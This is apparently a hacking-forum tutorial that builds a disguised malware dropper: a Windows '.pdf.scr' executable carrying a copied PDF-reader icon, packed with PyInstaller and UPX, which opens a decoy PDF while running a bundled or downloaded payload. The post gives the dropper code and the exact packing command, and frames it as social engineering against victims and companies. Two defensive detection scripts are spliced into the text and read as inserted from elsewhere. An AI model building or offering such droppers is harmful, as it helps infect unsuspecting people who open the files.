jay02452
Have fun guys
TUTORIAL: BEGINNERS SIMPLE MALWARE IN "PDF FILE"

Forewords

I created this tutorial because I remember when LTT (Linus Tech Tips) got hacked with a fake PDF file; it's so strange that a guy who likes high tech and has good computer-science skills could just fall into this trap. Same for the Twitter hack in 2020 by a teenager: just simple phishing. I understood at that moment that I had underestimated the power of social engineering and that we can really hack big things with...

Introduction

Ooohh, PDFs and documents. Maybe the best way to deliver malware: it's simple, everyone can open them, and the format is well known and used by every company. Earlier there were exploits for specific PDF readers, for example CVE-2009-0658 in Adobe Acrobat Reader; all of those are long patched. Then came .doc macros, which are now blocked by default for files that came from the internet, and lately the Follina exploit (CVE-2022-30190), which still works against machines that have not taken the June 2022 patch, plus other exploits that get patched really fast. Even I searched for many ways to deliver malware: a backdoor, a document, even a picture. Nowadays, without a good 0-day, it's hard to get people with these old exploits, but there is one thing that can't be patched: our brain. Yes, social engineering. In this tutorial we won't use any exploit; we will just make a simple but realistic pdf.scr.

Let's get started

First of all, what is a ".pdf.scr"? .scr is just the extension of Windows screensavers. It was meant for video and animation used as a screensaver, but a .scr is an ordinary PE executable, and Windows runs it like any .exe when you double-click it. As for ".pdf", it is just part of the file name; only the last dot counts. For example you can have "catgirls.txt.docx.pdf", which is simply a PDF file as far as Windows is concerned. This trick is called extension spoofing.

But you may ask, what's the point? Well, Windows with default settings ("Hide extensions for known file types") hides known extensions such as ".exe", so you can simply name a file catgirls.pdf.exe: since Windows knows .exe, it hides that extension and Explorer only shows "catgirls.pdf". On mouse hover (or in the "Type" column of the Details view) the file is reported as "Application" or "Screen saver", so an attentive user can see it is not a PDF, but most people don't know what a .scr file is. (For defenders: the setting is the HideFileExt value under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced; set it to 0 and the ".scr" stays visible.) That's the problem: we are humans, not devices, and this is social engineering. How to make it more realistic? We simply give the file the PDF reader's icon; most people will double-click, and the malware executes. One problem is that we don't know which PDF reader the target uses, so we can't put the exact icon. Most Windows 10 users just keep the built-in Microsoft Edge PDF reader, but people who work with PDFs all day and know the icon well can be a problem....

Now imagine a scenario where you deliver this kind of malware to a company, but you don't want them to know they got hacked. As it stands the "PDF" seems not to open, because there is only the malware: a careless user will think the PDF is broken, a careful one will realise they got hacked. We can simply make the malware drop and open a real PDF file! That's exactly what we will do in this tutorial: a pdf.scr file with the PDF icon that opens a real PDF.

So create your own test PDF, and let's get into it.
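The defender's side of the trick described above, as an added example that is not part of the original post: a small triage routine that reproduces what Explorer shows with the default setting, then checks the two things the name cannot hide, a decoy document extension sitting in front of an executable one, and a mismatch between what the last extension promises and what the leading bytes actually are. It generalises past .pdf.scr to the other decoy extensions the post mentions. The extension lists, the expected-type table and the sample file contents are constructed assumptions for the demo, not real files.

```python
import os

# Extensions Windows executes on double-click (assumed deny-list; extend as needed).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
                   ".vbs", ".vbe", ".wsf", ".hta", ".msi", ".ps1", ".lnk"}
# Document/image extensions an attacker borrows for the decoy part of the name.
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".png", ".jpg", ".jpeg"}
# .lnk is hidden even when "hide extensions" is off (NeverShowExt in the registry).
ALWAYS_HIDDEN = {".lnk"}

# Leading bytes tell the truth whatever the name says.
MAGIC = [
    (b"%PDF-", "pdf"),
    (b"MZ", "pe"),                  # .exe and .scr are both PE images
    (b"PK\x03\x04", "zip"),         # .docx / .xlsx are zip containers
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
]
# What the final (and therefore effective) extension promises the bytes will be.
EXPECTED_KIND = {".pdf": "pdf", ".docx": "zip", ".xlsx": "zip", ".png": "png",
                 ".jpg": "jpeg", ".jpeg": "jpeg", ".exe": "pe", ".scr": "pe"}


def sniff(data: bytes) -> str:
    """Return the container type implied by the leading bytes, or 'unknown'."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def extensions(name: str) -> list:
    """'a.pdf.scr' -> ['.pdf', '.scr']; only the last one means anything to Windows."""
    parts = os.path.basename(name).lower().split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def displayed_name(name: str, hide_known: bool = True) -> str:
    """Name as Explorer shows it: with the default 'Hide extensions for known file
    types' the last known extension is dropped, so 'x.pdf.scr' appears as 'x.pdf'."""
    root, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext in ALWAYS_HIDDEN or (hide_known and ext in EXECUTABLE_EXTS | DECOY_EXTS):
        return root
    return name


def triage(name: str, data: bytes) -> dict:
    """Flag name/content tricks; verdict is 'block', 'review' or 'ok'."""
    exts = extensions(name)
    final = exts[-1] if exts else ""
    kind = sniff(data)
    shown = displayed_name(name)
    findings = []
    if len(exts) >= 2 and final in EXECUTABLE_EXTS and exts[-2] in DECOY_EXTS:
        findings.append(f"double extension: Explorer shows '{shown}', Windows runs it as {final}")
    expected = EXPECTED_KIND.get(final)
    if expected and kind != expected:
        findings.append(f"content mismatch: {final} promised {expected}, bytes are {kind}")
    if kind == "pe" and findings:
        verdict = "block"
    elif findings:
        verdict = "review"
    else:
        verdict = "ok"
    return {"name": name, "shown_as": shown, "content": kind,
            "findings": findings, "verdict": verdict}


# Constructed samples: the byte strings are stand-ins for file headers, not real files.
SAMPLES = {
    "partnership2023.pdf.scr": b"MZ\x90\x00\x03\x00\x00\x00",     # the post's dropper shape
    "catgirls.txt.docx.pdf":   b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",  # many dots, honest final ext
    "invoice.pdf":             b"MZ\x90\x00",                      # PE renamed to .pdf: won't run, still wrong
    "setup.exe":               b"MZ\x90\x00",                      # honest executable
}


def triage_samples() -> dict:
    return {name: triage(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, r in triage_samples().items():
        print(f"{r['verdict']:6} {name:26} shown as {r['shown_as']!r}; "
              f"{'; '.join(r['findings']) or 'no findings'}")
```

Note that the check keys the expected content off the final extension, because that is the one the shell acts on; the displayed name is reported separately so an analyst sees exactly what the victim saw.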
Python program example

Since this tutorial is for newbies, and I want to keep it simple and friendly, we will use Python.

First of all we need the malware itself, and I won't write one from scratch for this tutorial; even during my tests I didn't use a whole malware, just a simple C# reverse shell. Since we want it to be realistic (50 MB PDFs sadly don't exist), we can make a light program that downloads the malware and opens the PDF. You can check my post on the simple FUD C# reverse shell to get a simple test program.
Code:
import os
import sys
import subprocess

# Directory the bundled files live in. Inside a PyInstaller onefile build that is a
# folder under %TEMP% named "_MEI" followed by random digits (exposed as sys._MEIPASS);
# when run as a plain script it is the script's own folder.
script_dir = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
malware = os.path.join(script_dir, 'malware.exe')       # your malware, bundled next to the script (a download variant follows below); the name must match exactly
pdf = os.path.join(script_dir, 'partnership2023.pdf')   # same for the decoy PDF: make sure you put the right name
os.system(pdf)                                         # open the PDF with its default handler; this is where it fails if the path is wrong
subprocess.Popen(malware, shell=True)                  # execute the malware without blocking the rest of the program
# And guess what, that's it.
This is a really basic implementation. If you want the program to download the malware and then execute it, add these lines before the execution; the easiest way is urllib:
Code:
import urllib.request
malwareurl = "
.exe"
downloadpath = "Updater.exe"
urllib.request.urlretrieve(malwareurl, downloadpath)  # downloads the file at malwareurl to downloadpath; no further comment needed, urllib is simply magic
Now we have our simple working code, and we can pack it with py2exe or PyInstaller. I personally like auto-py-to-exe, which is just a UI for PyInstaller: every PyInstaller option is there, and it's simple and fast. You can install and run it with:
Code:
pip install auto-py-to-exe && auto-py-to-exe
Since it has a UI, I won't explain further how to pack it into an exe; it's really simple, and you can even set the icon (see the next part for the "-i" argument).

The most important option is probably --add-data: in the "additional files" part you add your malware exe and the PDF file with the exact names you used in the Python file (during execution you will find these files in the "_MEI<digits>" folder under %TEMP%).

Anyway, here is the PyInstaller command I ended up with:
Code:
pyinstaller --noconfirm --onefile --windowed --icon "C:/Users/censored/censored/pdf.ico" --name "partnership2023.pdf" --upx-dir "C:/Users/censored/censored/UPX/" --clean --add-data "C:/Users/censored/Desktop/project/PDF_skid/partnership2023.pdf;." --add-data "C:/Users/censored/Desktop/project/PDF_skid/malware.exe;." "C:/Users/censored/Desktop/project/PDF_skid/script.py"
UPX makes the final exe smaller (keep in mind that a UPX-packed binary is itself a common antivirus heuristic). In a real-life scenario I would make a C# program that downloads and executes the malware, under 10 MB, published with UPX plus:
Code:
/p:EnableCompressionInSingleFile=true /p:PublishTrimmed=true
to make it as small as possible. Keep in mind that the Python code is only for testing purposes.... I might release a final C# version here.
Getting realistic icons

PyInstaller gives the option to choose the .ico file, and we need THAT ONE PDF reader icon. I didn't find the "official Microsoft Edge PDF reader ico" on the internet, so I just give you the one I extracted myself from the Edge app:

An .ico file can contain several images at different resolutions so that the icon stays readable at every size; this one does it properly.

You may understand better from a picture:
[Image: resolution-changes.png]
As you can see, on the left is a normal ico with a single resolution; the second one is the official one, which stays readable even at small sizes by making the "PDF" lettering bigger.

Now, can you see the difference between these two files?
[Image: realistic.png]
Yes, you do, but your victim won't.

Once you have downloaded the icon and added its path to your PyInstaller command, just click "CONVERT .PY TO .EXE", wait about 2 minutes, open the output folder, rename the result to .scr, and we're done...
Conclusion / making a real-life scenario

Now you might notice one issue: when we open the exe, if the PDF reader is Microsoft Edge we clearly see the path of the PDF, and it is a rather suspicious path (the "_MEI<digits>" folder under %TEMP%), because it is not where we opened the "PDF" from.

To avoid this, the idea would be to copy the PDF file into the directory the exe was launched from, make the exe hide itself, and finally open the PDF. You want the code? Well, I won't give it, and it still has some bugs. It's your turn to figure it out!

Anyway, we got a fake PDF (an .scr file) that opens a real PDF; that's already nice! There are other ways, such as a .lnk file, which is roughly the same idea. With this approach you can in fact spoof any extension and have the file open a real document, for example .docx, .xls, .txt, .png and .jpg. The catch is that some programs' icons have changed a lot over time, like Microsoft Word's, and remember that you don't know what software your target uses.
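That suspicious path is a reliable detection hook, so here is an added example (not the post's code) that turns the two PyInstaller artefacts this dropper leaves into a check: the "_MEI<digits>" staging folder under %TEMP% showing up as a child process's image or in its command line, and the archive cookie PyInstaller writes into every onefile build. The process-creation records are constructed in a simple key=value line format modelled on Sysmon Event ID 1 field names; the paths, the alert threshold and the stand-in bundle bytes are assumptions.

```python
import re

# PyInstaller onefile executables append a CArchive whose cookie begins with
# this 8-byte magic (PyInstaller's PYINST_COOKIE_MAGIC); extractors locate the
# archive by searching for it.
PYINSTALLER_COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"

# The bootloader unpacks that archive into %TEMP%\_MEI<digits>\ and runs
# everything from there; that folder name is the tell the post describes.
MEI_DIR = re.compile(r"\\Temp\\_MEI\d+\\", re.IGNORECASE)

# A decoy document extension followed by one Windows will execute.
DOUBLE_EXT_EXEC = re.compile(
    r"\.(pdf|docx?|xlsx?|txt|png|jpe?g)\.(exe|scr|pif|com)$", re.IGNORECASE)


def is_pyinstaller_bundle(data: bytes) -> bool:
    """Static check: does this file carry a PyInstaller archive cookie?"""
    return PYINSTALLER_COOKIE_MAGIC in data


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value|Key=Value' record (constructed format, not Sysmon's own)."""
    return dict(field.split("=", 1) for field in line.rstrip("\n").split("|"))


def reasons_for(ev: dict) -> list:
    """Return the suspicious traits of one process-creation event."""
    parent = ev.get("ParentImage", "")
    image = ev.get("Image", "")
    cmd = ev.get("CommandLine", "")
    reasons = []
    if DOUBLE_EXT_EXEC.search(parent):
        reasons.append("parent is a double-extension executable")
    if MEI_DIR.search(image):
        reasons.append("child image runs from a PyInstaller _MEI staging dir")
    elif MEI_DIR.search(cmd):
        reasons.append("child opens a document from a PyInstaller _MEI staging dir")
    return reasons


def detect(lines, threshold=2):
    """Alert on events with at least `threshold` traits; returns [(index, reasons)].
    A lone _MEI hit is normal for legitimate PyInstaller apps, hence the default of 2."""
    alerts = []
    for i, line in enumerate(lines):
        r = reasons_for(parse_event(line))
        if len(r) >= threshold:
            alerts.append((i, r))
    return alerts


# Constructed sample records shaped like Sysmon Event ID 1 fields (assumed paths).
SAMPLE_EVENTS = [
    # the decoy: the .scr hands the bundled PDF to Edge from the staging dir
    r'ParentImage=C:\Users\alice\Downloads\partnership2023.pdf.scr|Image=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe|CommandLine="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "C:\Users\alice\AppData\Local\Temp\_MEI48122\partnership2023.pdf"',
    # the payload: the bundled exe is executed from the same staging dir
    r'ParentImage=C:\Users\alice\Downloads\partnership2023.pdf.scr|Image=C:\Users\alice\AppData\Local\Temp\_MEI48122\malware.exe|CommandLine=C:\Users\alice\AppData\Local\Temp\_MEI48122\malware.exe',
    # benign: a user opens a downloaded PDF from Explorer
    r'ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe|CommandLine="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "C:\Users\alice\Downloads\report.pdf"',
    # benign-ish: an installed PyInstaller app spawning its own helper
    r'ParentImage=C:\Program Files\SomeVendor\tool.exe|Image=C:\Users\alice\AppData\Local\Temp\_MEI9001\helper.exe|CommandLine=C:\Users\alice\AppData\Local\Temp\_MEI9001\helper.exe --worker',
]

# Constructed stand-in for a onefile build: an MZ header with the cookie magic
# somewhere in the body (a real build carries it in a trailer near the end).
SAMPLE_BUNDLE = b"MZ\x90\x00" + b"\x00" * 32 + PYINSTALLER_COOKIE_MAGIC + b"\x00" * 16


if __name__ == "__main__":
    print("bundle:", is_pyinstaller_bundle(SAMPLE_BUNDLE))
    for idx, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT event {idx}: " + "; ".join(reasons))
```

Pairing the static cookie check with the process-lineage rule is what makes this usable: the cookie alone also matches every legitimate PyInstaller tool on the host, while a double-extension parent that spawns from or into a _MEI folder is the specific shape of this dropper.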
Keep in mind that I put a lot of effort even into a basic tutorial like this, so please comment and tell / ask / react.

Thanks for reading!